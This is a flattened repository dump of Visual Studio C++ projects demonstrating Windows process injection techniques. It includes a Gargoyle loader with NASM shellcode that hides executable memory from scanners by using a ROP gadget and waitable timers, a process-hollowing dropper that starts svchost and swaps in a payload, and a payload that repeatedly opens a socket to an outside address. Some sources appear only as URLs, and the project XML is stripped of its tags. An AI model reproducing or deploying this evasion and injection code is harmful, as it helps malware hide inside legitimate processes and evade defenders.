--------------------------------------------------------------------------------
1 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\dlltest\debug\dlltest.pch
2 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\dlltest\debug\vc140.pdb
3 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\dlltest\debug\vc140.idb
4 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\dlltest\debug\stdafx.obj
5 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\dlltest\debug\dlltest.obj
6 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\dlltest.ilk
7 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\dlltest.exe
8 | d:\users\sudo\documents\visual studio 2015\projects\processinjection\debug\dlltest.pdb
9 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.obj
10 | d:\users\sudo\documents\github\processinjection\dlltest\debug\stdafx.obj
11 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.pch
12 | d:\users\sudo\documents\github\processinjection\dlltest\debug\vc140.idb
13 | d:\users\sudo\documents\github\processinjection\dlltest\debug\vc140.pdb
14 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.tlog\cl.command.1.tlog
15 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.tlog\cl.read.1.tlog
16 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.tlog\cl.write.1.tlog
17 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.tlog\link.command.1.tlog
18 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.tlog\link.read.1.tlog
19 | d:\users\sudo\documents\github\processinjection\dlltest\debug\dlltest.tlog\link.write.1.tlog
20 |
--------------------------------------------------------------------------------
/DLLTest/Debug/DLLTest.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/DLLTest/InjectionDLL.h:
--------------------------------------------------------------------------------
1 | #ifndef InjectionDll_H_
2 | #define InjectionDll_H_
3 | #ifdef InjectionDLL
4 | #define InjectionDLL extern "C" _declspec(dllimport)
5 | #else
6 | #define InjectionDLL extern "C" _declspec(dllexport)
7 | #endif // InjectionDLL
8 | InjectionDLL void Ping();
9 | #endif // !InjectionDll_H_
10 |
11 |
--------------------------------------------------------------------------------
/DLLTest/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DLLTest Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DLLTest application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DLLTest application.
9 |
10 |
11 | DLLTest.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DLLTest.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DLLTest.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DLLTest.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/DLLTest/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DLLTest.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/DLLTest/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/DLLTest/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/DLLTest/x64/Debug/DLLTest.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/DLLTest/x64/Release/DLLTest.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/EXEPayload/Debug/EXEPayload.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/EXEPayload/EXEPayload.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {974E1B91-0F7A-4139-9DE0-4617A02EA4F3}
23 | EXEPayload
24 | 8.1
25 |
26 |
27 |
28 | Application
29 | true
30 | v140
31 | MultiByte
32 |
33 |
34 | Application
35 | false
36 | v140
37 | true
38 | MultiByte
39 |
40 |
41 | Application
42 | true
43 | v140
44 | MultiByte
45 |
46 |
47 | Application
48 | false
49 | v140
50 | true
51 | MultiByte
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | Level3
75 | Disabled
76 | true
77 |
78 |
79 |
80 |
81 | Level3
82 | Disabled
83 | true
84 |
85 |
86 |
87 |
88 | Level3
89 | MaxSpeed
90 | true
91 | true
92 | true
93 |
94 |
95 | true
96 | true
97 |
98 |
99 |
100 |
101 | Level3
102 | MaxSpeed
103 | true
104 | true
105 | true
106 |
107 |
108 | true
109 | true
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
--------------------------------------------------------------------------------
/EXEPayload/EXEPayload.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/EXEPayload/main.cpp:
--------------------------------------------------------------------------------
1 | #include "main.h"
2 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
3 | {
4 | MessageBoxA(NULL, "test", "tt", 0);
5 | while (1)
6 | {
7 | TryConnect();
8 | Sleep(5000);
9 | }
10 | }
11 |
12 |
13 | void TryConnect()
14 | {
15 | WSADATA wsa;
16 | if (WSAStartup(MAKEWORD(1, 1), &wsa) != 0)
17 | {
18 | return;
19 | }
20 | SOCKET m_socket = socket(AF_INET, SOCK_STREAM, 0);
21 | SOCKADDR_IN SocketSendIn;
22 | SocketSendIn.sin_family = AF_INET;
23 | SocketSendIn.sin_addr.S_un.S_addr = inet_addr("114.114.114.114");
24 | SocketSendIn.sin_port = htons(53);
25 | connect(m_socket, (SOCKADDR*)&SocketSendIn, sizeof(SOCKADDR));
26 | closesocket(m_socket);
27 | WSACleanup();
28 | }
29 |
--------------------------------------------------------------------------------
/EXEPayload/main.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma comment(lib,"Ws2_32.lib")
5 | using namespace std;
6 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow);
7 | void TryConnect();
8 |
--------------------------------------------------------------------------------
/EXEPayload/x64/Debug/EXEPayload.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Gargoyle/Gargoyle.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 |
6 | #include
7 | #include
8 | #include
9 |
10 | using namespace std;
11 |
12 | namespace {
13 | typedef void(*callable)(void*);
14 | typedef tuple MyTuple;
15 | constexpr DWORD invocation_interval_ms = 15 * 1000;
16 | constexpr size_t stack_size = 0x10000;
17 |
18 | vector> rop_gadget_candidates = {
19 | { 0x59, 0x5C, 0xC3 }, // pop ecx; pop esp; ret
20 | { 0x58, 0x5C, 0xC3 } // pop eax; pop esp; ret
21 | };
22 |
23 | struct SetupConfiguration {
24 | uint32_t initialized;
25 | void* setup_address;
26 | uint32_t setup_length;
27 | void* VirtualProtectEx;
28 | void* WaitForSingleObjectEx;
29 | void* CreateWaitableTimer;
30 | void* SetWaitableTimer;
31 | void* MessageBox;
32 | void* tramp_addr;
33 | void* sleep_handle;
34 | uint32_t interval;
35 | void* target;
36 | uint8_t shadow[8];
37 | };
38 |
39 | struct StackTrampoline {
40 | void* VirtualProtectEx;
41 | void* return_address;
42 | void* current_process;
43 | void* address;
44 | uint32_t size;
45 | uint32_t protections;
46 | void* old_protections_ptr;
47 | uint32_t old_protections;
48 | void* setup_config;
49 | };
50 |
51 | struct Workspace {
52 | SetupConfiguration config;
53 | uint8_t stack[stack_size];
54 | StackTrampoline tramp;
55 | };
56 | }
57 |
58 | Workspace& allocate_workspace() {
59 | auto result = VirtualAllocEx(GetCurrentProcess(), nullptr, sizeof(Workspace), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
60 | if (!result) throw runtime_error("[-] Couldn't VirtualAllocEx: " + GetLastError());
61 | RtlSecureZeroMemory(result, sizeof(Workspace));
62 | return *static_cast(result);
63 | }
64 |
65 | MyTuple allocate_pic(const string& filename) {
66 | fstream file_stream{ filename, fstream::in | fstream::ate | fstream::binary };
67 | if (!file_stream) throw runtime_error("[-] Couldn't open \"" + filename + "\".");
68 | auto pic_size = static_cast(file_stream.tellg());
69 | file_stream.seekg(0, fstream::beg);
70 | auto pic = VirtualAllocEx(GetCurrentProcess(), nullptr, pic_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
71 | if (!pic) throw runtime_error("[-] Couldn't VirtualAllocEx: " + GetLastError());
72 | file_stream.read(static_cast(pic), pic_size);
73 | file_stream.close();
74 | DWORD old_protection;
75 | auto prot_result = VirtualProtectEx(GetCurrentProcess(), pic, pic_size, PAGE_EXECUTE_READ, &old_protection);
76 | if (!prot_result) throw runtime_error("[-] Couldn't VirtualProtectEx: " + GetLastError());
77 | return MyTuple(pic, pic_size);
78 | }
79 |
80 | void* get_system_dll_gadget(const string& system_dll_filename) {
81 | printf("[ ] Loading \"%s\" system DLL.\n", system_dll_filename.c_str());
82 | auto dll_base = reinterpret_cast(LoadLibraryA(system_dll_filename.c_str()));
83 | if (!dll_base) throw runtime_error("[-] Couldn't LoadLibrary: " + GetLastError());
84 |
85 | printf("[+] Loaded \"%s\" at 0x%p.\n", system_dll_filename.c_str(), dll_base);
86 |
87 | auto pe_header = ImageNtHeader(dll_base);
88 | if (!pe_header) throw runtime_error("[-] Couldn't ImageNtHeader: " + GetLastError());
89 |
90 | auto filtered_section_headers = vector();
91 | auto section_header = reinterpret_cast(pe_header + 1);
92 | for (int i = 0; i < pe_header->FileHeader.NumberOfSections; ++i)
93 | {
94 | if (section_header->Characteristics & IMAGE_SCN_MEM_EXECUTE) {
95 | filtered_section_headers.push_back(section_header);
96 | printf("[ ] Found executable section \"%s\" at 0x%p.\n", section_header->Name, dll_base + section_header->VirtualAddress);
97 | }
98 | section_header++;
99 | };
100 |
101 | for (auto section_header : filtered_section_headers)
102 | {
103 | for (auto rop_gadget : rop_gadget_candidates)
104 | {
105 | auto section_base = dll_base + section_header->VirtualAddress;
106 | vector section_content(section_base, section_base + section_header->Misc.VirtualSize);
107 | auto search_result = search(begin(section_content), end(section_content), begin(rop_gadget), end(rop_gadget));
108 | if (search_result == end(section_content))
109 | continue;
110 |
111 | auto rop_gadget_offset = section_base + (search_result - begin(section_content));
112 | printf("[+] Found ROP gadget in section \"%s\" at 0x%p.\n", section_header->Name, rop_gadget_offset);
113 | return rop_gadget_offset;
114 | }
115 | }
116 |
117 | printf("[-] Didn't find ROP gadget in \"%s\".\n", system_dll_filename.c_str());
118 | return 0;
119 | }
120 |
121 | void* get_gadget(bool use_system_dll, const string& gadget_system_dll_filename, const string& gadget_pic_path) {
122 | void* memory;
123 | if (use_system_dll) {
124 | memory = get_system_dll_gadget(gadget_system_dll_filename);
125 | }
126 | if (!use_system_dll || !memory) {
127 | printf("[ ] Allocating executable memory for \"%s\".\n", gadget_pic_path.c_str());
128 | size_t size;
129 | tie(memory, size) = allocate_pic(gadget_pic_path);
130 | printf("[+] Allocated %u bytes for gadget PIC.\n", size);
131 | }
132 | return memory;
133 | }
134 |
135 | void launch(const string& setup_pic_path, const string& gadget_system_dll_filename, const string& gadget_pic_path) {
136 | printf("[ ] Allocating executable memory for \"%s\".\n", setup_pic_path.c_str());
137 | void* setup_memory; size_t setup_size;
138 | tie(setup_memory, setup_size) = allocate_pic(setup_pic_path);
139 | printf("[+] Allocated %d bytes for PIC.\n", setup_size);
140 |
141 | auto use_system_dll{ true };
142 | printf("[ ] Configuring ROP gadget.\n");
143 | auto gadget_memory = get_gadget(use_system_dll, gadget_system_dll_filename, gadget_pic_path);
144 | printf("[+] ROP gadget configured.\n");
145 |
146 | printf("[ ] Allocating read/write memory for config, stack, and trampoline.\n");
147 | auto& scratch_memory = allocate_workspace();
148 | auto& config = scratch_memory.config;
149 | auto& tramp = scratch_memory.tramp;
150 | printf("[+] Allocated %u bytes for scratch memory.\n", sizeof(scratch_memory));
151 |
152 | printf("[ ] Building stack trampoline.\n");
153 | tramp.old_protections_ptr = &tramp.old_protections;
154 | tramp.protections = PAGE_EXECUTE_READ;
155 | tramp.current_process = GetCurrentProcess();
156 | tramp.VirtualProtectEx = VirtualProtectEx;
157 | tramp.size = static_cast(setup_size);
158 | tramp.address = setup_memory;
159 | tramp.return_address = setup_memory;
160 | tramp.setup_config = &config;
161 | printf("[+] Stack trampoline built.\n");
162 |
163 | printf("[ ] Building configuration.\n");
164 | config.setup_address = setup_memory;
165 | config.setup_length = static_cast(setup_size);
166 | config.VirtualProtectEx = VirtualProtectEx;
167 | config.WaitForSingleObjectEx = WaitForSingleObjectEx;
168 | config.CreateWaitableTimer = CreateWaitableTimerW;
169 | config.SetWaitableTimer = SetWaitableTimer;
170 | config.MessageBox = MessageBoxA;
171 | config.tramp_addr = &tramp;
172 | config.interval = invocation_interval_ms;
173 | config.target = gadget_memory;
174 | printf("[+] Configuration built.\n");
175 |
176 | printf("[+] Success!\n");
177 | printf(" ================================\n");
178 | printf(" Gargoyle PIC @ -----> 0x%p\n", setup_memory);
179 | printf(" ROP gadget @ -------> 0x%p\n", gadget_memory);
180 | printf(" Configuration @ ----> 0x%p\n", &scratch_memory.config);
181 | printf(" Top of stack @ -----> 0x%p\n", &scratch_memory.stack);
182 | printf(" Bottom of stack @ --> 0x%p\n", &scratch_memory.stack[stack_size - 1]);
183 | printf(" Stack trampoline @ -> 0x%p\n", &scratch_memory.tramp);
184 |
185 | reinterpret_cast(setup_memory)(&config);
186 | }
187 |
188 | int main() {
189 | try {
190 | launch("setup.pic", "mshtml.dll", "gadget.pic");
191 | }
192 | catch (exception& e) {
193 | printf("%s\n", e.what());
194 | }
195 | }
196 |
--------------------------------------------------------------------------------
/Gargoyle/Gargoyle.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {F313E731-84FF-42BB-8EF6-1FC64489C27E}
23 | Win32Proj
24 | Gargoyle
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 | NotUsing
87 | Level3
88 | Disabled
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | false
91 |
92 |
93 | Console
94 | true
95 | DbgHelp.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)
96 |
97 |
98 |
99 |
100 | Use
101 | Level3
102 | Disabled
103 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | false
105 |
106 |
107 | Console
108 | true
109 |
110 |
111 |
112 |
113 | Level3
114 | Use
115 | MaxSpeed
116 | true
117 | true
118 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
119 | true
120 |
121 |
122 | Console
123 | true
124 | true
125 | true
126 |
127 |
128 |
129 |
130 | Level3
131 | Use
132 | MaxSpeed
133 | true
134 | true
135 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
136 | true
137 |
138 |
139 | Console
140 | true
141 | true
142 | true
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 | false
154 | Document
155 | nasm -f bin setup.nasm -o $(Configuration)\setup.pic
156 | $(SolutionDir)$(Configuration)\gadget.pic
157 |
158 |
159 | Document
160 | nasm -f bin setup.nasm -o $(Configuration)\setup.pic
161 | $(Configuration)\setup.pic
162 |
163 |
164 |
165 |
166 |
167 |
--------------------------------------------------------------------------------
/Gargoyle/Gargoyle.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/Gargoyle/ReadMe.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/Gargoyle/ReadMe.txt
--------------------------------------------------------------------------------
/Gargoyle/gadget.nasm:
--------------------------------------------------------------------------------
1 | BITS 32
2 |
3 | pop eax
4 | pop esp
5 | ret
--------------------------------------------------------------------------------
/Gargoyle/setup.nasm:
--------------------------------------------------------------------------------
1 | BITS 32
2 |
3 | STRUC Configuration
4 | .initialized: RESD 1
5 | .setup_addr: RESD 1
6 | .setup_length: RESD 1
7 | .VirtualProtectEx: RESD 1
8 | .WaitForSingleObjectEx: RESD 1
9 | .CreateWaitableTimer: RESD 1
10 | .SetWaitableTimer: RESD 1
11 | .MessageBox: RESD 1
12 | .trampoline_addr: RESD 1
13 | .sleep_handle: RESD 1
14 | .interval: RESD 1
15 | .gadget: RESD 1
16 | .shadow: RESD 2
17 | .stack: RESB 0x10000
18 | .trampoline: RESD 9
19 | ENDSTRUC
20 |
21 | ; Call me like void (*__cdecl callable)(void* workspace);
22 |
23 | mov ebx, [esp+4] ; Configuration in ebx now
24 | lea esp, [ebx + Configuration.trampoline - 4] ; Bottom of "stack"
25 | mov ebp, esp
26 |
27 | ; If we're initialized, skip to trampoline fixup
28 | mov edx, [ebx + Configuration.initialized]
29 | cmp edx, 0
30 | jne reset_trampoline
31 |
32 | ; Create the timer
33 | push 0
34 | push 0
35 | push 0
36 | mov ecx, [ebx + Configuration.CreateWaitableTimer]
37 | call ecx
38 | mov [ebx + Configuration.sleep_handle], eax
39 |
40 | ; Set the timer
41 | push 0
42 | mov ecx, [ebx + Configuration.trampoline_addr]
43 | push ecx
44 | mov ecx, [ebx + Configuration.gadget]
45 | push ecx
46 | mov ecx, [ebx + Configuration.interval]
47 | push ecx
48 | lea ecx, [ebx + Configuration.shadow]
49 | push ecx
50 | mov ecx, [ebx + Configuration.sleep_handle]
51 | push ecx
52 | mov ecx, [ebx + Configuration.SetWaitableTimer]
53 | call ecx
54 |
55 | ; Set the initialized bit
56 | mov [ebx + Configuration.initialized], dword 1
57 |
58 | ; Replace the return address on our trampoline
59 | reset_trampoline:
60 | mov ecx, [ebx + Configuration.VirtualProtectEx]
61 | mov [ebx + Configuration.trampoline], ecx
62 |
63 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
64 | ;;;; Arbitrary code goes here. Note that the
65 | ;;;; default stack is pretty small (65k).
66 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
67 | ; Pop a MessageBox as example
68 | push 0 ; null
69 | push 0x656c796f ; oyle
70 | push 0x67726167 ; garg
71 | mov ecx, esp
72 | push 0x40 ; Info box
73 | push ecx ; ptr to 'gargoyle' on stack
74 | push ecx ; ptr to 'gargoyle' on stack
75 | push 0
76 | mov ecx, [ebx + Configuration.MessageBox]
77 | call ecx
78 | mov esp, ebp
79 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
80 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
81 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
82 |
83 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
84 | ;;;; Time to setup tail calls to go down
85 | ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
86 | ; Setup arguments for WaitForSingleObjectEx x1
87 | push 1
88 | push 0xFFFFFFFF
89 | mov ecx, [ebx + Configuration.sleep_handle]
90 | push ecx
91 | push 0 ; Return address never ret'd
92 |
93 | ; Setup arguments for WaitForSingleObjectEx x2
94 | push 1
95 | push 0xFFFFFFFF
96 | mov ecx, [ebx + Configuration.sleep_handle]
97 | push ecx
98 | ; Tail call to WaitForSingleObjectEx
99 | mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
100 | push ecx
101 |
102 | ; Setup arguments for VirtualProtectEx
103 | lea ecx, [ebx + Configuration.shadow]
104 | push ecx
105 | push 2 ; PAGE_READONLY
106 | mov ecx, [ebx + Configuration.setup_length]
107 | push ecx
108 | mov ecx, [ebx + Configuration.setup_addr]
109 | push ecx
110 | push dword 0xffffffff
111 | ; Tail call to WaitForSingleObjectEx
112 | mov ecx, [ebx + Configuration.WaitForSingleObjectEx]
113 | push ecx
114 |
115 | ; Jump to VirtualProtectEx
116 | mov ecx, [ebx + Configuration.VirtualProtectEx]
117 | jmp ecx
--------------------------------------------------------------------------------
/Gargoyle/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/HollowingDropper/Debug/HollowingDropper.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/HollowingDropper/HollowingDropper.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {6DF3715B-102F-4B2F-8A47-F954478A017B}
23 | Win32Proj
24 | HollowingDropper
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
91 | true
92 |
93 |
94 | Console
95 | true
96 |
97 |
98 |
99 |
100 |
101 |
102 | Level3
103 | Disabled
104 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
105 | true
106 |
107 |
108 | Console
109 | true
110 |
111 |
112 |
113 |
114 | Level3
115 |
116 |
117 | MaxSpeed
118 | true
119 | true
120 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
121 | true
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 | Level3
133 |
134 |
135 | MaxSpeed
136 | true
137 | true
138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
139 | true
140 |
141 |
142 | Console
143 | true
144 | true
145 | true
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
--------------------------------------------------------------------------------
/HollowingDropper/HollowingDropper.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 | Source Files
26 |
27 |
28 |
29 |
30 | Header Files
31 |
32 |
33 | Header Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/HollowingDropper/HollowingProcess.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/HollowingDropper/HollowingProcess.cpp
--------------------------------------------------------------------------------
/HollowingDropper/PE.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/HollowingDropper/PE.cpp
--------------------------------------------------------------------------------
/HollowingDropper/PE.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/HollowingDropper/PE.h
--------------------------------------------------------------------------------
/HollowingDropper/main.cpp:
--------------------------------------------------------------------------------
1 | #include "stdafx.h"
2 |
3 | int main()
4 | {
5 | cout << "Process Hollowing" << endl;
6 | LPSTR lpCommandLine = (LPSTR)"svchost";
7 |
8 | #ifdef _WIN64
9 | LPSTR lpSourceFile = (LPSTR)"D:\\users\\sudo\\Documents\\GitHub\\ProcessInjection\\x64\\Debug\\EXEPayload.exe";
10 | #else
11 | LPSTR lpSourceFile = (LPSTR)"D:\\users\\sudo\\Documents\\GitHub\\ProcessInjection\\Debug\\EXEPayload.exe";
12 | #endif // _WIN64
13 |
14 | HANDLE hProcess = CreateHollowedProcess(lpCommandLine, lpSourceFile);
15 | system("pause");
16 |
17 | if (hProcess)
18 | {
19 | TerminateProcess(hProcess, 4);
20 | WaitForSingleObject(hProcess, 0);
21 | }
22 | return 0;
23 | }
--------------------------------------------------------------------------------
/HollowingDropper/stdafx.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | using namespace std;
4 | HANDLE CreateHollowedProcess(LPSTR lpCommandLine, LPSTR lpSourceFile);
5 |
--------------------------------------------------------------------------------
/HollowingDropper/x64/Debug/HollowingDropper.log:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Images/PE - Copy.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/Images/PE - Copy.jpg
--------------------------------------------------------------------------------
/Images/PEB.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/Images/PEB.jpg
--------------------------------------------------------------------------------
